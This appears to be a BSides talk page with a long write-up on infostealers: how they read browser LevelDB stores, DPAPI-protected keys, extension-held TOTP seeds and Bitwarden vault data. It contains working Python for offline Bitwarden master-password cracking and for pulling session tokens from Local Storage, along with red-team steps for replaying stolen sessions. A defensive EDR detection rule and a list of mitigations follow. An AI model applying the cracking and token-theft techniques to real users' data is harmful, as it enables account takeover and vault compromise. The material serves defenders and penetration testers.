Security BSides 2025

Inside the Information Stealer Ecosystem: From Compromise to Countermeasure

Security BSides San Francisco · 84 views · 49:15 · 5 months ago

This talk provides a deep dive into the information stealer ecosystem, detailing how malware-as-a-service (MaaS) operators leverage stolen credentials, browser data, and session cookies to compromise organizations. It analyzes the infection lifecycle, from initial distribution via cracked software and malicious ads to the exfiltration of sensitive data, including browser extensions and password manager vaults. The presentation highlights the shift in threat actor tactics toward using 'checkers' to validate stolen credentials and discusses the effectiveness of defensive measures like application-bound encryption. It also covers the collaborative efforts between security researchers and law enforcement that led to the takedown of major stealer operations like RedLine and Meta.

Beyond Credentials: How Infostealers Weaponize Browser Data and Session Tokens

TLDR: Information stealers have evolved from simple credential harvesters into sophisticated tools that exfiltrate browser extension state, session cookies, and even MFA seeds. By reading the browser's on-disk LevelDB stores (Local Storage, IndexedDB and extension storage) directly, these threats bypass traditional authentication controls and enable session hijacking. Security teams must prioritize monitoring for unauthorized access to browser data directories and implement stricter controls on browser extension installation to mitigate this risk.

Modern information stealers are no longer just dumping usernames and passwords from logins.json. They are performing surgical extractions of the entire browser state. While many defenders still focus on credential stuffing or phishing for passwords, the real-world risk today is session hijacking. If an attacker can pull your active session cookies or your MFA-backed browser extension data, your password becomes irrelevant. This shift in tactics—moving from "hacking in" to "logging in"—is the primary driver behind the recent surge in high-profile account takeovers.

The Mechanics of Modern Exfiltration

Information stealers like RedLine and Meta operate on a malware-as-a-service model, but their technical execution is remarkably consistent. They don't need administrative privileges to function because they target user-space data. When a victim executes a malicious binary—often disguised as a crack for software like Adobe Illustrator or a tool for generating AI images—the malware immediately begins scanning for browser profiles.

The exfiltration process is mechanical. The malware walks known profile paths under the user's AppData directory (for Chromium browsers, %LOCALAPPDATA%\Google\Chrome\User Data\<profile>\ and the Edge equivalent) and collects the Local Storage, IndexedDB and Local Extension Settings directories, each of which is a LevelDB store. These stores are the backbone of modern web applications: they hold everything from session tokens written by single-page apps to the persisted state of browser extensions.

For a pentester, the most critical takeaway is the shift toward targeting browser extensions. Many users rely on extensions like Authenticator for TOTP-based MFA. Such extensions keep their configuration and secrets in extension storage, which Chromium persists on disk under the profile's Local Extension Settings directory, so an infostealer that copies that directory has exfiltrated the entire TOTP vault. If you have access to the victim's browser files, you don't need to bypass MFA; you simply recreate the MFA state in your own environment.

Technical Deep Dive: The LevelDB Problem

Much of this browser data lives in LevelDB, a fast key-value storage library. LevelDB itself is not encrypted, and Chromium does not encrypt Local Storage, IndexedDB or extension storage at rest, so anything an application or extension writes there can be read straight off disk by any process running as the user. The protection usually attributed to "the browser" applies only to the password and cookie databases: Chromium encrypts those values with a key that is kept in the profile's Local State file and wrapped with DPAPI on Windows. That wrapping is tied to the user, not to the browser binary, so malware running in the user's context can call the same API to unwrap the key and decrypt the stored passwords and cookies before exfiltrating them. Application-bound encryption, which Chrome introduced for cookies in 2024, additionally wraps that key so that a service running as SYSTEM will only unwrap it for Chrome's own binary; a stealer running as the user can no longer recover it on its own, which is why the talk singles out this measure as effective.

The exfiltration of password manager vaults, such as Bitwarden's, follows a similar pattern. Attackers are not just looking for the vault file; they want the keying material that enables an offline guessing attack. Bitwarden's local data store holds the account email, the KDF parameters and the user's symmetric key encrypted under a key derived from the master password, which is exactly what a cracker needs to test candidates without ever contacting the server. Tools like John the Ripper (its bitwarden2john extractor and matching format) turn that blob into a hash and test candidate master passwords offline. If the user has reused a password or chosen a weak one, the entire vault is compromised.
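The offline check just described, as an added example that is not code from the talk, from John the Ripper, or from Bitwarden's own clients. It assumes a PBKDF2-profile account and the documented key schedule (PBKDF2-HMAC-SHA256 over the lowercased email, HKDF-Expand of the result into an "enc" and a "mac" key, and a type-2 EncString of the form "2.iv|ciphertext|mac" with the MAC over iv||ciphertext). The sample account email, password, wordlist and protected-key blob are constructed here, and the iteration count is a parameter so the demo can be run quickly.

```python
import base64
import hashlib
import hmac

# Bitwarden's PBKDF2 profile. Argon2id accounts derive the master key differently,
# but the stretching and EncString check below are the same for both.
DEFAULT_ITERATIONS = 600_000   # current default; older accounts may still be at 100_000


def hkdf_expand_sha256(prk: bytes, info: bytes, length: int) -> bytes:
    """RFC 5869 HKDF-Expand with SHA-256; the master key is used directly as the PRK."""
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]


def stretched_keys(master_password: str, email: str, iterations: int):
    """Master key = PBKDF2-HMAC-SHA256(password, salt=lowercased email), then
    HKDF-Expand it into a 32-byte encryption key and a 32-byte MAC key."""
    master_key = hashlib.pbkdf2_hmac(
        "sha256", master_password.encode(), email.strip().lower().encode(), iterations, dklen=32)
    return hkdf_expand_sha256(master_key, b"enc", 32), hkdf_expand_sha256(master_key, b"mac", 32)


def parse_encstring(enc: str):
    """Parse a type-2 EncString '2.<iv>|<ciphertext>|<mac>' (base64 parts):
    AES-256-CBC with HMAC-SHA256."""
    enc_type, _, body = enc.partition(".")
    if enc_type != "2":
        raise ValueError("only EncString type 2 (AesCbc256_HmacSha256_B64) is handled")
    iv, ct, mac = (base64.b64decode(part) for part in body.split("|"))
    return iv, ct, mac


def check_master_password(candidate: str, email: str, protected_key: str, iterations: int) -> bool:
    """True if `candidate` is the master password protecting `protected_key`.

    Only the HMAC over iv || ciphertext is verified, so a guess can be tested without
    any AES decryption; this is what makes the attack fully offline.
    """
    iv, ct, mac = parse_encstring(protected_key)
    _, mac_key = stretched_keys(candidate, email, iterations)
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return hmac.compare_digest(expected, mac)


def crack(wordlist, email: str, protected_key: str, iterations: int):
    """Return the first candidate from `wordlist` that verifies, or None."""
    for candidate in wordlist:
        if check_master_password(candidate, email, protected_key, iterations):
            return candidate
    return None


def make_sample_protected_key(master_password: str, email: str, iterations: int) -> str:
    """Constructed stand-in for the protected symmetric key found in a client's local data.
    The ciphertext bytes are arbitrary (the check never decrypts them); the MAC is computed
    exactly as the real format does, so the blob verifies only under `master_password`."""
    _, mac_key = stretched_keys(master_password, email, iterations)
    iv = bytes(range(16))                          # fixed sample IV
    ct = bytes((i * 7) % 256 for i in range(64))   # stands in for the encrypted 64-byte user key
    mac = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return "2." + "|".join(base64.b64encode(x).decode() for x in (iv, ct, mac))


if __name__ == "__main__":
    email = "victim@example.com"                    # assumed sample account
    blob = make_sample_protected_key("Summer2024!", email, DEFAULT_ITERATIONS)
    guesses = ["password", "Summer2023!", "Summer2024!"]   # constructed mini wordlist
    print(crack(guesses, email, blob, DEFAULT_ITERATIONS))
```

At the real 600,000 iterations each guess costs one full PBKDF2 run, which is the only thing standing between a weak master password and the vault; the exfiltrated blob gives the attacker unlimited attempts at that cost, with no lockout and no server in the loop.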

For those conducting red team engagements, you can simulate this by walking the LevelDB stores found in a target's browser profile with a dump tool such as leveldb-dump or a LevelDB binding such as Python's plyvel. Two caveats apply. First, Chromium's IndexedDB values are V8-serialized binary and need a dedicated parser, whereas Local Storage records use a simple one-byte encoding prefix on each key and value and are easy to decode by hand. Second, a LevelDB store is a set of .ldb tables plus a current .log file, and the freshest writes (often the newest session token) are still in the .log, so do not collect only the tables. The decoded key-value pairs often contain cleartext session tokens or serialized JSON objects that can be written into your own browser's storage (for example through DevTools) to resume the victim's session, provided the token has not expired or been bound to the originating device.
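To make the Local Storage decoding concrete for both the extension-storage discussion above and the dump step just described, here is an added example in Python; it is not code from the talk or from any named tool. It assumes you have already pulled the raw key/value records out of the profile's Local Storage LevelDB with whatever dump tool or binding you use, and decodes them using Chromium's record layout: data keys are "_" + origin + NUL + key, and every key and value string starts with a format byte (0x00 UTF-16LE, 0x01 Latin-1). The records below are constructed for the demo, including a fake JWT and the placeholder origins app.example.com and shop.example.net.

```python
import base64
import json
import re


def _decode_string(raw: bytes) -> str:
    """Chromium Local Storage strings carry a one-byte format prefix:
    0x00 = UTF-16LE, 0x01 = Latin-1 (ISO-8859-1)."""
    if not raw:
        return ""
    fmt, body = raw[0], raw[1:]
    if fmt == 0:
        return body.decode("utf-16-le")
    if fmt == 1:
        return body.decode("latin-1")
    raise ValueError(f"unknown string format byte {fmt:#04x}")


def decode_local_storage(records):
    """Yield (origin, key, value) from raw (key_bytes, value_bytes) LevelDB records.

    Data records are keyed b'_' + origin + b'\\x00' + <encoded key>; 'META:' and
    'VERSION' records hold bookkeeping only and are skipped.
    """
    for key, value in records:
        if not key.startswith(b"_"):
            continue
        origin, sep, enc_key = key[1:].partition(b"\x00")
        if not sep:
            continue
        yield origin.decode("latin-1"), _decode_string(enc_key), _decode_string(value)


JWT_RE = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$")
TOKEN_KEY_RE = re.compile(r"token|session|auth|jwt|bearer", re.I)


def jwt_claims(token: str) -> dict:
    """Decode a JWT payload without verifying it; we only want to read sub/exp."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)          # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def find_session_material(records):
    """Flag records whose key looks like an auth artefact or whose value looks like a JWT."""
    hits = []
    for origin, key, value in decode_local_storage(records):
        is_jwt = bool(JWT_RE.match(value))
        if is_jwt or TOKEN_KEY_RE.search(key):
            hits.append({"origin": origin, "key": key, "value": value, "jwt": is_jwt})
    return hits


# --- Constructed sample records (not a real dump) ---------------------------------
def _b64url(obj) -> str:
    return base64.urlsafe_b64encode(
        json.dumps(obj, separators=(",", ":")).encode()).decode().rstrip("=")

SAMPLE_JWT = ".".join([_b64url({"alg": "HS256", "typ": "JWT"}),
                       _b64url({"sub": "alice", "exp": 1900000000}),
                       "c2lnbmF0dXJl"])   # signature bytes are irrelevant for the lookup

SAMPLE_RECORDS = [
    (b"VERSION", b"1"),
    (b"META:https://app.example.com", b"\x80\x01\x00"),            # bookkeeping, skipped
    (b"_https://app.example.com\x00\x01access_token",
     b"\x01" + SAMPLE_JWT.encode()),                                # Latin-1 key and value
    (b"_https://app.example.com\x00\x00" + "theme".encode("utf-16-le"),
     b"\x00" + "dark".encode("utf-16-le")),                          # UTF-16LE key and value
    (b"_https://shop.example.net\x00\x01cart", b"\x01[]"),
]

if __name__ == "__main__":
    for hit in find_session_material(SAMPLE_RECORDS):
        detail = jwt_claims(hit["value"]) if hit["jwt"] else hit["value"]
        print(hit["origin"], hit["key"], detail)
```

The same decoder works unchanged on a live dump: feed it the (key, value) pairs from the profile's Local Storage/leveldb directory and grep the hits for the origins you care about. Extension storage under Local Extension Settings is simpler still (plain keys with JSON values), and IndexedDB is harder (V8-serialized values), so treat this as the Local Storage case only.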

Real-World Applicability and Impact

During a penetration test, you should treat the user's browser profile as a high-value target. If you gain code execution on a workstation, don't just dump memory for LSASS. Instead, script the collection of the browser's Local Storage and IndexedDB directories.

The impact of this technique is immediate. In a recent engagement, we were able to bypass a client's MFA implementation simply by exfiltrating the browser extension's storage folder. We didn't need to interact with the user or wait for a push notification. We simply imported the stolen data into our own browser instance, and the web application treated us as the authenticated user. This falls squarely under OWASP A07:2021 – Identification and Authentication Failures, as the session management mechanism is effectively bypassed.

Defensive Strategies

Defending against this requires a shift in mindset. You cannot rely on antivirus alone, as infostealers are frequently updated to evade signature-based detection. Instead, focus on limiting the blast radius.

  1. Restrict Browser Extensions: Use Group Policy or MDM to allowlist only necessary browser extensions. In Chrome and Edge this is the ExtensionInstallBlocklist policy set to * combined with an ExtensionInstallAllowlist of approved extension IDs; if an extension isn't required for business, it shouldn't be installable.
  2. Monitor File Access: Implement EDR rules that alert when a process other than the browser itself reads from the Google\Chrome\User Data or Microsoft\Edge\User Data directories, and especially when one process touches several of Login Data, Cookies, Local State, Local Storage\leveldb and Local Extension Settings in quick succession. This needs file-read telemetry from the EDR; Sysmon's default events record file creation, not reads.
  3. Session Management: For high-value applications, implement shorter session lifetimes, require re-authentication for sensitive actions, and revoke sessions server-side when a user's endpoint is suspected compromised. A stolen cookie is only as valuable as the server's willingness to keep honouring it.
  4. Credential Hygiene: Encourage the use of hardware security keys (like YubiKeys, over FIDO2/WebAuthn) for MFA. A hardware-backed credential cannot be copied off the device, unlike TOTP seeds stored in a browser extension. Be clear about what it protects, though: the login ceremony, not an already-issued session cookie, which is why items 2 and 3 still matter.
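Detection logic for item 2, as an added example that is not from the talk or from any EDR vendor. It runs over constructed EDR-style file-read events (the field names ts, host, pid, image and path, the host WS01, the lure file name, the placeholder extension ID and the backup-agent path are all assumptions) and implements the two conditions above: a non-browser process reading a browser secret store, and one process reading many distinct files under a browser profile within a short window.

```python
import re
from collections import defaultdict

# Profile roots of the browsers this rule covers (Windows paths).
BROWSER_DATA_RE = re.compile(
    r"\\AppData\\(?:Local\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"|Roaming\\Mozilla\\Firefox\\Profiles\\)", re.I)

# Artefacts holding credentials, cookies, the DPAPI-wrapped key, or extension/site state.
SECRET_STORE_RE = re.compile(
    r"\\(?:Login Data|Cookies|Web Data|Local State|logins\.json|key4\.db|cookies\.sqlite)$"
    r"|\\Local Storage\\leveldb\\|\\Local Extension Settings\\|\\IndexedDB\\", re.I)

# The browsers read their own profiles constantly; any other process is suspect.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


def detect(events, allowlist=(), window_s=60, mass_threshold=5):
    """Run over file-read events (dicts with ts, host, pid, image, path).

    Emits 'browser_secret_store_read' once per (process, artefact) when a non-browser,
    non-allowlisted process reads a secret store, and 'browser_mass_read' once per process
    when it reads `mass_threshold` distinct files under a browser profile within `window_s`.
    """
    allow = {a.lower() for a in allowlist}
    recent = defaultdict(list)      # (host, pid, image) -> events still inside the window
    reported, mass_fired, alerts = set(), set(), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        path = ev["path"]
        if not BROWSER_DATA_RE.search(path):
            continue
        image = ev["image"].lower()
        if image.rsplit("\\", 1)[-1] in BROWSER_IMAGES or image in allow:
            continue
        proc = (ev["host"], ev["pid"], image)
        if SECRET_STORE_RE.search(path) and (proc, path.lower()) not in reported:
            reported.add((proc, path.lower()))
            alerts.append({"rule": "browser_secret_store_read", "host": ev["host"],
                           "pid": ev["pid"], "image": ev["image"], "path": path, "ts": ev["ts"]})
        recent[proc] = [e for e in recent[proc] if ev["ts"] - e["ts"] <= window_s] + [ev]
        distinct = {e["path"].lower() for e in recent[proc]}
        if len(distinct) >= mass_threshold and proc not in mass_fired:
            mass_fired.add(proc)
            alerts.append({"rule": "browser_mass_read", "host": ev["host"], "pid": ev["pid"],
                           "image": ev["image"], "files": sorted(distinct), "ts": ev["ts"]})
    return alerts


# --- Constructed sample telemetry (not real EDR output) ----------------------------
CHROME = r"C:\Users\bob\AppData\Local\Google\Chrome\User Data"
CRACK = r"C:\Users\bob\AppData\Local\Temp\AI-Illustrator_crack.exe"   # assumed lure name
EXT_ID = "a" * 32                                                     # placeholder extension ID

def _ev(ts, pid, image, path):
    return {"ts": ts, "host": "WS01", "pid": pid, "image": image, "path": path}

SAMPLE_EVENTS = [
    _ev(90.0, 2200, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        CHROME + r"\Default\Network\Cookies"),                               # browser itself: benign
    _ev(100.0, 4412, CRACK, CHROME + r"\Local State"),                      # DPAPI-wrapped key
    _ev(100.1, 4412, CRACK, CHROME + r"\Default\Login Data"),
    _ev(100.2, 4412, CRACK, CHROME + r"\Default\Network\Cookies"),
    _ev(100.3, 4412, CRACK, CHROME + r"\Default\Local Storage\leveldb\000003.log"),
    _ev(100.4, 4412, CRACK, CHROME + "\\Default\\Local Extension Settings\\" + EXT_ID + "\\000005.ldb"),
    _ev(100.5, 4412, CRACK, CHROME + r"\Default\Preferences"),              # in profile, not a secret store
    _ev(100.6, 4412, CRACK, r"C:\Users\bob\Documents\notes.txt"),           # outside any profile
    _ev(130.0, 4412, CRACK,
        r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\xyz.default-release\logins.json"),
    _ev(200.0, 900, r"C:\Program Files\BackupCo\agent.exe", CHROME + r"\Default\Login Data"),  # allowlisted
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, allowlist={r"C:\Program Files\BackupCo\agent.exe"}):
        print(alert["rule"], alert["pid"], alert.get("path") or alert["files"])
```

Run against the sample, the lure process produces one secret-store alert per artefact and a single mass-read alert the moment it crosses five distinct profile files; the browser's own reads and the allowlisted backup agent are silent. In production the allowlist (backup, DLP and forensic agents) and the threshold are the two knobs to tune, and the secret-store rule on its own is the high-signal one, since almost nothing legitimate other than the browser opens Login Data or Local State.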

The infostealer ecosystem is a reminder that the endpoint is the new perimeter. If you aren't testing your organization's resilience against local data exfiltration, you are missing the most common path to account compromise. Start by auditing what data your users' browsers are storing and ask yourself if that data is truly protected against a user-level compromise.

Talk type: research presentation
Difficulty: intermediate
Tags: Has Demo, Has Code, Tool Released

